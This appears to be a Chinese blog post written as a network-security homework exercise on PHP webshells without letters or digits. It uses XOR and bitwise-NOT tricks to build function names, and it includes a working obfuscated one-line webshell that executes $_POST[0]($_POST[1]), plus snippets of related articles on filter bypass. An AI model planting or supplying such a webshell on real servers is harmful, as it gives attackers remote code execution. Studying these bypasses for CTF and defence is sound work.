网安第六次作业

最新推荐文章于 2024-08-11 23:08:34 发布
原创 最新推荐文章于 2024-08-11 23:08:34 发布 · 126 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#原型模式 #redis

一、异或

当$ 和 _ 没有被限制时

1、异或的前置知识
在这里插入图片描述

A的ascll码为65 二进制为0100 0001
的ascll码为96 二进制为0110 0000 A和 取异或 即相同位 置0 ,不同位置 1
然后A 和 ` 得到的二进制码为 0010 0001 ,ascll码为33 ,ascll码表对应符号为!
在这里插入图片描述

2、进阶版异或
代码:

<?php
        function B(){
                echo "at the function";
        }
        $__="?" ^ "}";
        echo "\$__值为:$__";
        $__();
?>

在这里插入图片描述

?:0011 1111
} :0111 1101
0100 0010 -----66
在这里插入图片描述
所以异或的结果为B,将值赋值给了$__;
在这里插入图片描述
在这里插入图片描述

3、异或构建一句话木马

<?php
        $_++; //$_=1
        $__=("#" ^ "|"); // _
        $__.=("." ^ "~"); //_P   // .为拼接字符
        $__.=("/" ^ "`"); //_PO
        $__.=("|" ^ "/"); //_POS
        $__.=("{" ^ "/"); //_POST
        ${$__}[!$_](${$__}[$_]);  //$_POST[0]($_POST[1]);
?>

使用蚁剑连接这个一句话木马;

在这里插入图片描述
在这里插入图片描述

需要绕过的正则:
在这里插入图片描述

在这里插入图片描述

二、取反

代码:

<?php
        $a = "phpinfo";
        echo urlencode(~$a);
?>

在这里插入图片描述

phpinfo 取反的值为: %8F%97%8F%96%91%99%90

?code== _=~%8F%97%8F%96%91%99%90;= _();

三、自增

四、临时文件

在这里插入图片描述

C先生_
关注
无字母绕过webshell
banliyaoguai的博客
08-13 898
但是抓取临时文件很难因为你上传上去后,没有接收文件,系统就会很快的删除掉你的文件,然后想要接收文件还需要知道文件名字,但是文件名是一个随机字符没有用办法接到。··反引号可以在eval中命令执行在这里的代码就是上面说的匹配上文件,再进行命令执行,然后由于这个是get传参所以需要需要进行url编码,然后就执行成功了。如果可以访问并执行临时文件,就可以进行命令执行了,我们在要上传的文件上写入你要执行的命令,如下图所示。在PHP7中我们可以使用('phpinfo')(),这样的代码执行,如下图。
无字母数字的Webshell
paidx0
08-13 650
无字母数字的Webshell 直接看题,边看边说 <?php if(isset($_GET['cmd'])){ $cmd=$_GET['cmd']; highlight_file(__FILE__); if(preg_match("/[A-Za-oq-z0-9$]+/",$cmd)){ die("cerror"); }
【PHP代码注入】PHP代码注入漏洞
cc
03-06 6812
call_user_func()等函数都有调用其他函数的功能,其中的一个参数作为要调用的函数名,那如果这个传入的函数名可控,那就可以调用意外的函数来执行我们想要的代码,也就是存在任意代码执行漏洞。以call_user_func($fun,$para)函数为例,该函数的第一个参数作为回调函数,后面的参数为回调函数的参数,将$para这个参数传递给$fun这个函数去执行。我们可以利用file_get_contents()函数,写入文件,该函数的作用在于将第二个参数作为内容写入到第一个参数的文件中。
不包含字母和数字的webshell
m0_59049258的博客
08-19 746
当$ 和 _ 没有被限制时。
构造不包含字母和数字的webshell
weixin_54347738的博客
08-20 504
assert(eval())是可以的,assert中执行了eval函数。这里面1提交过去的是字符串,assert函数无法执行字符串。异或的二进制的值是00100001,对应的ASCII值是33,对应的字符串的值就是!第二行中,ascii码,>的大于
周玉川-2017221302006-技术第六次作业1
08-08
(2)实现包过滤几乎不再需要费用 (3)包过滤路由器对用户和应用来说是透明的 (2)只能阻止一种类型的IP欺骗 (3)任何直接经过路由器的数据包都有被用作数据驱
周玉川-2017221302006-技术第四次作业1
08-03
例如,二进制数110表示属主有读写权限,属组和其他用户只有读权限,对应的十进制数为6。 5. Windows 访问控制: Windows 的访问控制有两种模式:本地模式和域模式。域模式下,系统由域控制器管理,用户和设备必须...
操作系统选择题及答案解析(川大) 第二章 操作系统概述
wion03的博客
06-12 1579
四川大学操作系统选择题答案及解析,本文以操作系统—精髓与设计原理(第九版中文翻译版)为参考,答案仅供参考,如有疑惑欢迎提出指正。转载请标明出处。
我的作业2/21
wwp的博客
02-21 161
一、SQL-labs Less8 1.判断是否存在SQL注入 http://127.0.0.1/sqli/Less-8/?id=1 http://127.0.0.1/sqli/Less-8/?id=1' 由两次结果可知,存在SQL注入问题。 2.构造正确的SQL语句 http://127.0.0.1/sqli/Less-8/?id=1' --+ 3.开始猜解表名 由于是布尔盲注,手动实在是太慢了,我觉得用burpsuite爆破都很麻烦,但是我自己的代码能力又很差,唉,彷佛看到了我的之路的终点
无字母数字webshell
m0_65429684的博客
04-22 1915
核心思路是,将非字母、数字的字符经过各种变换,最后能构造出a-z中任意一个字符。然后再利用PHP允许动态函数执行的特点,拼接处一个函数名,如“assert”,然后动态执行之即可。在此之前,我需要说说php5和7的差异。php5中assert是一个函数,我们可以通过$f='assert';$f(...);这样的方法来动态执行任意代码。但php7中,assert不再是函数,变成了一个语言结构(类似eval),不能再作为函数名动态执行代码,所以利用起来稍微复杂一点。
如何通过非数字与字符的方式实现PHP WebShell详解
08-30
主要给大家介绍了关于如何通过非数字与字符的方式实现PHP WebShell的相关资料,文中通过示例代码介绍的非常详细,对大家具有一定的参考学习价值,需要的朋友们下面来一起看看吧。
无字母数字的webshell
weixin_43940853的博客
02-29 2048
构造无数字字母的webshell 1.异或 可以看到将A和?进行异或可以得到~ 异或的过程就是将字符转化为ascii,再变为二进制进行异或 这里就是将"A"的Ascii码的二进制与"?"的Ascii码的二进制进行异或得到一个新的二进制,在变为Ascii码,最后在变为字符,也就是~ 首先我们实现构造assert($_POST[_]); <?php for ($i=0; $i < 256...
无字母数字webshell总结
hackzkaq的博客
05-07 2383
零基础学黑客,搜索公众号:白帽子左一 关于无字母数字Webshell这个话题,可以说是老生常谈了。之前打 CTF 的时候也经常会遇到,每次都让人头大,所谓无字符webshell,其基本原型就是对以下代码的绕过: <?php if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) { eval($_GET['shell']); } ## 基础知识 ## PHP中的异或 来看这样一段代码: <?php echo "5"^"Z"; ?> 结果
学习笔记-无字母数字Webshell
人饭子的博客
10-31 1880
无字母数字Webshell 相关文章 & Source & Reference 记一次拿webshell踩过的坑(如何用PHP编写一个不包含数字和字母的后门) 一些不包含数字和字母的webshell 无字母数字Webshell之提高篇 浅析CTF绕过字符数字构造shell 异或绕过 <?php echo "A"^"?"; //输出的结果是字符"~...
无字母数字webshell之命令执行
最新发布
Pu5073的博客
08-11 664
这里post作为请求体,而code作为get传参,执行完后才会删除临时文件。或者叫period,它的作用和source一样,就是用当前的shell执行一个文件中的命令。比如,当前运行的shell是bash,则。这个通配符的文件有很多,如果先匹配到别的文件则会出现错误,导致整个流程停止,根本不会执行到我们上传的文件。我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是。的意思就是用bash执行file文件中的命令。执行文件,是不需要file有x权限的。
一些不包含数字和字母的webshell之方法一
Limerence98
08-08 2486
昨天在做题的时候遇到了这样一道题 &amp;lt;?php include 'flag.php'; if(isset($_GET['t'])){ $_COOKIE['bash_token'] = $_GET['t']; }else{ die(&quot;Token Lost.&quot;); } if(isset($_GET['code'])){ $code = $_GET['code']; ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值